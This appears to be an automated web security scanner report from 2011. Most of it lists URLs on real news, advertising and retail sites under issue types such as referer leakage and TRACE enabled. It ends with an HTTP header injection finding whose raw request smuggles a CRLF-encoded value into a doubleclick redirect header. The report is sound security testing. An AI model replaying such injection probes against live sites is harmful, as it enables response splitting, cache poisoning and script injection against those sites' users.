11.49. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

11.50. http://segment-pixel.invitemedia.com/pixel

11.51. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434

11.52. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif

11.53. http://sitelife.usatoday.com/ver1.0/Content/images/store/0/4/10516936-900e-4800-949f-6bf88e9054a7.P4Avatar.jpg

11.54. http://sitelife.usatoday.com/ver1.0/Content/images/store/0/6/409d4e2c-128c-4123-962d-2682bb7c58c3.P4Avatar.gif

11.55. http://sitelife.usatoday.com/ver1.0/Content/images/store/12/3/0c59ddcb-14b2-4a24-83ef-b67cd107c524.P4Avatar.jpg

11.56. http://sitelife.usatoday.com/ver1.0/Content/images/store/13/12/7db8438d-87d0-417f-bc4a-8ae8beafb554.P4Avatar.jpg

11.57. http://sitelife.usatoday.com/ver1.0/Content/images/store/2/8/22005321-8ed2-4f70-a8ee-77647e52878f.P4Avatar.gif

11.58. http://sitelife.usatoday.com/ver1.0/Content/images/store/8/4/78dbe245-8052-454f-8454-f58c95181887.P4Avatar.bmp

11.59. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

11.60. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png

11.61. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

11.62. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

11.63. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

11.64. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

11.65. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif

11.66. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

11.67. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

11.68. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png

11.69. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png

11.70. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png

11.71. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png

11.72. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

11.73. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

11.74. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

11.75. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif

11.76. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif

11.77. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

11.78. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

11.79. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

11.80. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

11.81. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

11.82. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

11.83. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

11.84. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

11.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

11.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

11.87. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

11.88. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

11.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

11.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

11.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

11.92. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

11.93. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js

11.94. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js

11.95. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

11.96. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

11.97. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js

11.98. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

11.99. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css

11.100. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

11.101. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

11.102. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

11.103. http://syndication.mmismm.com/tntwo.php

11.104. http://tacoda.at.atwola.com/rtx/r.js

11.105. http://tags.bluekai.com/site/3775

11.106. http://tags.bluekai.com/site/3869

11.107. http://trc.taboolasyndication.com/usatoday/log/2/visible

11.108. http://trgc.opt.fimserve.com/fp.gif

11.109. http://trgca.opt.fimserve.com/fp.gif

11.110. http://va.px.invitemedia.com/adnxs_imp

11.111. http://www.groupon.com/dallas/

11.112. http://www.groupon.com/learn

11.113. http://www.groupon.com/mobile

11.114. http://www.groupon.com/privacy

11.115. http://www.groupon.com/subscriptions/new

11.116. https://www.groupon.com/dallas/

11.117. https://www.groupon.com/learn

11.118. https://www.groupon.com/login

11.119. https://www.groupon.com/mobile

11.120. https://www.groupon.com/users

11.121. https://www.groupon.com/users/new

11.122. http://www.hnedata.net/features/tr_stock_charts

11.123. http://www.tinbuadserv.com/v3/serve.php

12. Password field with autocomplete enabled

12.1. http://shop.npr.org/index.php

12.2. https://www.groupon.com/login

12.3. https://www.groupon.com/users/new

12.4. http://www.npr.org/templates/reg/

12.5. http://www.npr.org/templates/reg/login.php

12.6. http://www.therepublic.com/login/

12.7. http://www.therepublic.com/login/register/

13. Source code disclosure

13.1. http://assets1.grouponcdn.com/assets/application.js

13.2. http://assets1.grouponcdn.com/assets/subscriptions.js

14. ASP.NET debugging enabled

15. Referer-dependent response

15.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

15.2. http://480-adver-view.c3metrics.com/v.js

15.3. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

15.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

15.5. http://jqueryui.com/ui/jquery.ui.widget.js

15.6. http://www.facebook.com/plugins/like.php

15.7. http://www.facebook.com/plugins/recommendations.php

15.8. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

15.9. https://www.groupon.com/users

16. Cross-domain POST

16.1. http://radar.weather.gov/Conus/index.php

16.2. http://radar.weather.gov/radar.php

16.3. http://www.csmonitor.com/Business

16.4. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down

17. Cross-domain Referer leakage

17.1. http://ad.amgdgt.com/ads/

17.2. http://ad.amgdgt.com/ads/

17.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

17.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

17.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

17.6. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11

17.7. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.15

17.8. http://ad.doubleclick.net/adj/invc.macroaxis/widget

17.9. http://ads.bridgetrack.com/a/f/

17.10. http://ads.pointroll.com/PortalServe/

17.11. http://ads.pointroll.com/PortalServe/

17.12. http://ads.pointroll.com/PortalServe/

17.13. http://ads.pointroll.com/PortalServe/

17.14. http://bidder.mathtag.com/iframe/notify

17.15. http://bidder.mathtag.com/iframe/notify

17.16. http://choices.truste.com/ca

17.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

17.18. http://finance.fox8live.com/inergize.wvue

17.19. http://fls.doubleclick.net/activityi

17.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

17.21. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

17.22. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

17.23. http://googleads.g.doubleclick.net/pagead/ads

17.24. http://ib.adnxs.com/ptj

17.25. http://ib.adnxs.com/ptj

17.26. http://login.npr.org/openid/embed

17.27. http://radar.weather.gov/radar.php

17.28. http://shop.npr.org/

17.29. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp

17.30. http://wvue.web.entriq.net/nw/dpm/loadplayer/

17.31. http://www.facebook.com/plugins/like.php

17.32. http://www.facebook.com/plugins/recommendations.php

17.33. http://www.groupon.com/subscriptions/new

17.34. http://www.groupon.com/subscriptions/new

17.35. http://www.srh.noaa.gov/lmrfc/

18. Cross-domain script include

18.1. http://ad.amgdgt.com/ads/

18.2. http://ad.amgdgt.com/ads/

18.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

18.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

18.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

18.6. http://bidder.mathtag.com/iframe/notify

18.7. http://bidder.mathtag.com/iframe/notify

18.8. http://content.usatoday.com/topics/reporter/Doyle+Rice

18.9. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

18.10. http://finance.fox8live.com/inergize.wvue

18.11. http://googleads.g.doubleclick.net/pagead/ads

18.12. http://ib.adnxs.com/ptj

18.13. http://login.npr.org/openid/embed

18.14. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

18.15. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

18.16. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

18.17. http://shop.npr.org/

18.18. http://shop.npr.org/spoken-word/npr-american-chronicles-the-civil-war/

18.19. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_ent.html

18.20. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_lif.html

18.21. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_spt.html

18.22. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_wld.html

18.23. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp

18.24. http://www.csmonitor.com/Business

18.25. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down

18.26. http://www.facebook.com/plugins/like.php

18.27. http://www.facebook.com/plugins/recommendations.php

18.28. http://www.fox8live.com/business/default.aspx

18.29. http://www.fox8live.com/business/iframe_financialticker.aspx

18.30. http://www.fox8live.com/business/iframe_indexwatch.aspx

18.31. http://www.fox8live.com/content/aboutus/default.aspx

18.32. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

18.33. http://www.fox8live.com/content/news/seregni/default.aspx

18.34. http://www.fox8live.com/content/news/watercooler/default.aspx

18.35. http://www.fox8live.com/default.aspx

18.36. http://www.fox8live.com/entertainment/horoscopes/default.aspx

18.37. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

18.38. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

18.39. http://www.fox8live.com/rss/default.aspx

18.40. http://www.fox8live.com/wireless/default.aspx

18.41. http://www.groupon.com/learn

18.42. http://www.groupon.com/mobile

18.43. http://www.groupon.com/privacy

18.44. http://www.groupon.com/rounded_bottom.png

18.45. http://www.groupon.com/subscriptions/new

18.46. https://www.groupon.com/login

18.47. https://www.groupon.com/users/new

18.48. http://www.hnedata.net/features/tr_stock_charts

18.49. http://www.natchezdemocrat.com/

18.50. http://www.therepublic.com/home/

18.51. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

19. TRACE method is enabled

19.1. http://amch.questionmarket.com/

19.2. http://bh.contextweb.com/

19.3. http://cdn.taboolasyndication.com/

19.4. http://chart.financialcontent.com/

19.5. http://image2.pubmatic.com/

19.6. http://matcher-apx.bidder7.mookie1.com/

19.7. http://matcher.bidder7.mookie1.com/

19.8. http://matcher.bidder8.mookie1.com/

19.9. http://metrics.csmonitor.com/

19.10. http://metrics.npr.org/

19.11. http://optimized-by.rubiconproject.com/

19.12. http://r.openx.net/

19.13. http://secure-us.imrworldwide.com/

19.14. http://t.mookie1.com/

19.15. http://tacoda.at.atwola.com/

19.16. http://tracker.bidder7.mookie1.com/

19.17. http://tracker.financialcontent.com/

19.18. http://trc.taboolasyndication.com/

19.19. http://usatoday1.112.2o7.net/

19.20. http://widgets.outbrain.com/

19.21. http://wvue.web.entriq.net/

19.22. http://www.collegesurfing.com/

19.23. http://www.npr.org/

19.24. http://www.srh.noaa.gov/

19.25. http://www.tinbuadserv.com/

20. Email addresses disclosed

20.1. http://radar.weather.gov/Conus/index.php

20.2. http://radar.weather.gov/radar.php

20.3. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js

20.4. http://shop.npr.org/content/vendors/jquery/rater/jquery.rater-custom.js

20.5. http://www.fox8live.com/business/default.aspx

20.6. http://www.fox8live.com/content/aboutus/default.aspx

20.7. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

20.8. http://www.fox8live.com/content/news/seregni/default.aspx

20.9. http://www.fox8live.com/content/news/watercooler/default.aspx

20.10. http://www.fox8live.com/default.aspx

20.11. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

20.12. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

20.13. http://www.fox8live.com/wireless/default.aspx

20.14. http://www.groupon.com/privacy

20.15. https://www.groupon.com/login

20.16. http://www.macroaxis.com/widgets/url.jsp

20.17. http://www.natchezdemocrat.com/

20.18. http://www.npr.org/templates/javascript/generated/regPage.js

20.19. http://www.srh.noaa.gov/cte.htm

20.20. http://www.srh.noaa.gov/lmrfc/

20.21. http://www.srh.noaa.gov/lmrfc/quickbrief.php

20.22. http://www.srh.noaa.gov/srh.htm

20.23. http://www.therepublic.com/assets/gzip.php

20.24. http://www.therepublic.com/assets/scripts/menu/menu.js

20.25. http://www.therepublic.com/home/

20.26. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

21. Private IP addresses disclosed

21.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.2. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

21.3. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png

21.4. http://www.facebook.com/extern/login_status.php

21.5. http://www.facebook.com/extern/login_status.php

21.6. http://www.facebook.com/extern/login_status.php

21.7. http://www.facebook.com/plugins/like.php

21.8. http://www.facebook.com/plugins/like.php

21.9. http://www.facebook.com/plugins/like.php

21.10. http://www.facebook.com/plugins/like.php

21.11. http://www.facebook.com/plugins/like.php

21.12. http://www.facebook.com/plugins/like.php

21.13. http://www.facebook.com/plugins/like.php

21.14. http://www.facebook.com/plugins/like.php

21.15. http://www.facebook.com/plugins/like.php

21.16. http://www.facebook.com/plugins/like.php

21.17. http://www.facebook.com/plugins/like.php

21.18. http://www.facebook.com/plugins/like.php

21.19. http://www.facebook.com/plugins/like.php

21.20. http://www.facebook.com/plugins/like.php

21.21. http://www.facebook.com/plugins/like.php

21.22. http://www.facebook.com/plugins/like.php

21.23. http://www.facebook.com/plugins/like.php

21.24. http://www.facebook.com/plugins/like.php

21.25. http://www.facebook.com/plugins/like.php

21.26. http://www.facebook.com/plugins/like.php

21.27. http://www.facebook.com/plugins/like.php

21.28. http://www.facebook.com/plugins/recommendations.php

21.29. http://www.facebook.com/plugins/recommendations.php

21.30. http://www.facebook.com/plugins/recommendations.php

22. Robots.txt file

22.1. http://ad.amgdgt.com/ads/

22.2. http://ad.doubleclick.net/pfadx/csmonitor_cim/

22.3. http://ads.pointroll.com/PortalServe/

22.4. http://amch.questionmarket.com/adscgen/sta.php

22.5. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

22.6. http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_2s208.css

22.7. http://at.amgdgt.com/ads/

22.8. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

22.9. http://b.scorecardresearch.com/b

22.10. http://b.voicefive.com/b

22.11. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

22.12. http://bidder.mathtag.com/iframe/notify

22.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

22.14. http://cache-01.cleanprint.net/cp/psj

22.15. http://content.usatoday.com/apps/insidepage/crc.ashx

22.16. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

22.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js

22.18. http://data.usatoday.net/apps/InsidePage

22.19. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBannerEx.js

22.20. http://fls.doubleclick.net/activityi

22.21. http://gannett.gcion.com/addyn/3.0/5111.1/809057/0/-1/ADTECH

22.22. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030881291/

22.23. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js

22.24. http://jqueryui.com/ui/jquery.ui.widget.js

22.25. http://l.addthiscdn.com/live/t00/250lo.gif

22.26. http://login.npr.org/openid/embed

22.27. http://map.media6degrees.com/orbserv/hbpix

22.28. http://metrics.csmonitor.com/b/ss/fcocscsm/1/H.21/s92332599295768

22.29. http://metrics.npr.org/b/ss/nprorg/1/H.17/s91303597942460

22.30. http://mobile.fox8live.com/BlackBerry/default.aspx

22.31. http://pagead2.googlesyndication.com/pagead/imgad

22.32. http://pixel.quantserve.com/pixel

22.33. http://pubads.g.doubleclick.net/gampad/ads

22.34. http://s0.2mdn.net/dot.gif

22.35. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYg4cDIIyHAyoFh8MAAD8yBYPDAAAP

22.36. http://safebrowsing.clients.google.com/safebrowsing/gethash

22.37. http://segment-pixel.invitemedia.com/pixel

22.38. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

22.39. http://speed.pointroll.com/PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg

22.40. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.41. http://stp.fox8live.com/common/pagereporting/nettracker/ntpagetag.gif

22.42. http://t.pointroll.com/PointRoll/Track/

22.43. http://toolbarqueries.clients.google.com/tbproxy/af/query

22.44. http://trc.taboolasyndication.com/usatoday/log/2/available

22.45. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s97032880377955

22.46. http://va.px.invitemedia.com/adnxs_imp

22.47. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj

22.48. http://widgets.macroaxis.com/widgets/content.jsp

22.49. http://www.collegesurfing.com/searchbox-mge-us.php

22.50. http://www.csmonitor.com/Business

22.51. http://www.facebook.com/plugins/like.php

22.52. http://www.fox8live.com/business/default.aspx

22.53. http://www.google-analytics.com/__utm.gif

22.54. http://www.google.com/finance/chart

22.55. http://www.googleadservices.com/pagead/conversion/1030881291/

22.56. http://www.groupon.com/subscriptions/new

22.57. https://www.groupon.com/login

22.58. http://www.macroaxis.com/widgets/url.jsp

22.59. http://www.meebo.com/cmd/getrotate

22.60. http://www.natchezdemocrat.com/

22.61. http://www.npr.org/templates/reg

22.62. http://www.tinbuadserv.com/v3/serve.php

22.63. http://www.usatoday.com/weather/stormcenter/default.htm

23. Cacheable HTTPS response

23.1. https://shop.npr.org/favicon.ico

23.2. https://www.groupon.com/login

23.3. https://www.groupon.com/users/new

24. HTML does not specify charset

24.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

24.2. http://480-adver-view.c3metrics.com/v.js

24.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

24.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

24.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

24.6. http://ad.doubleclick.net/pfadx/csmonitor_cim/

24.7. http://ads.bridgetrack.com/a/f/

24.8. http://ads.bridgetrack.com/ads_v2/script/btwrite.js

24.9. http://ads.pointroll.com/PortalServe/

24.10. http://amch.questionmarket.com/adscgen/sta.php

24.11. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

24.12. http://bidder.mathtag.com/iframe/notify

24.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.14. http://fls.doubleclick.net/activityi

24.15. http://login.npr.org/openid/embed

24.16. http://odb.outbrain.com/utils/ping.html

24.17. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

24.18. http://share.meebo.com/cim/whitev4.html

24.19. http://uac.advertising.com/wrapper/aceUACping.htm

24.20. http://wvue.web.entriq.net/nw/dpm/loadplayer/

24.21. http://www.fox8live.com/images/phone.png

24.22. http://www.fox8live.com/sites/scripps/images/rounding/tab-bg.gif

24.23. http://www.fox8live.com/sites/wvue/images/promos/fox8insider.jpg

24.24. http://www.therepublic.com/assets/images/ui-bg_flat_75_ffffff_40x100.png

24.25. http://www.therepublic.com/assets/images/ui-bg_glass_65_ffffff_1x400.png

24.26. http://www.therepublic.com/assets/images/ui-bg_glass_75_e6e6e6_1x400.png

24.27. http://www.usatoday.com/_common/_includes/_community/taboola-async.ssi

25. Content type incorrectly stated

25.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

25.2. http://480-adver-view.c3metrics.com/v.js

25.3. http://a1.interclick.com/getInPageJS.aspx

25.4. http://a1.interclick.com/getInPageJSProcess.aspx

25.5. http://ad.doubleclick.net/pfadx/csmonitor_cim/

25.6. http://adadvisor.net/adscores/g.js

25.7. http://ads.bridgetrack.com/ads_v2/script/btwrite.js

25.8. http://ads.pointroll.com/PortalServe/

25.9. http://amch.questionmarket.com/adscgen/sta.php

25.10. http://ar.voicefive.com/b/rc.pli

25.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.12. http://cdn.rpxnow.com/rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js

25.13. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx

25.14. http://event.adxpose.com/event.flow

25.15. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js

25.16. http://mobile.fox8live.com/ScriptResource.axd

25.17. http://radar.weather.gov/Conus/images/favicon.ico

25.18. http://radar.weather.gov/images/favicon.ico

25.19. http://shop.npr.org/favicon.ico

25.20. http://shop.npr.org/resize.php

25.21. https://shop.npr.org/favicon.ico

25.22. https://shop.npr.org/resize.php

25.23. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

25.24. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

25.25. http://trc.taboolasyndication.com/usatoday/trc/2/json

25.26. http://widgets.macroaxis.com/widgets/content.jsp

25.27. http://wvue.web.entriq.net/nw/dpm/loadplayer/

25.28. http://www.collegesurfing.com/js/MGEProgramCategoryDropDown.php

25.29. http://www.macroaxis.com/widgets/url.jsp

25.30. http://www.srh.noaa.gov/images/favicon.ico

25.31. http://www.usatoday.com/community/tags/GetLinkedByline.ashx

26. Content type is not specified

27. SSL certificate

27.1. https://shop.npr.org/

27.2. https://www.groupon.com/

1. HTTP header injection
There are 14 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.doubleclick.net/ad/N4873.npr.og/B5461009 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4873.npr.og/B5461009

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8fdb9%0d%0a31e2c62f70f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8fdb9%0d%0a31e2c62f70f/N4873.npr.og/B5461009;sz=1x1;pc=[TPAS_ID];ord=0.699075760319829 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-5&r=0.699075760319829&server=polRedir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8fdb9
31e2c62f70f
/N4873.npr.og/B5461009;sz=1x1;pc=[TPAS_ID];ord=0.699075760319829:
Date: Mon, 09 May 2011 15:40:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2d7db%0d%0ac78d659218b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2d7db%0d%0ac78d659218b/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
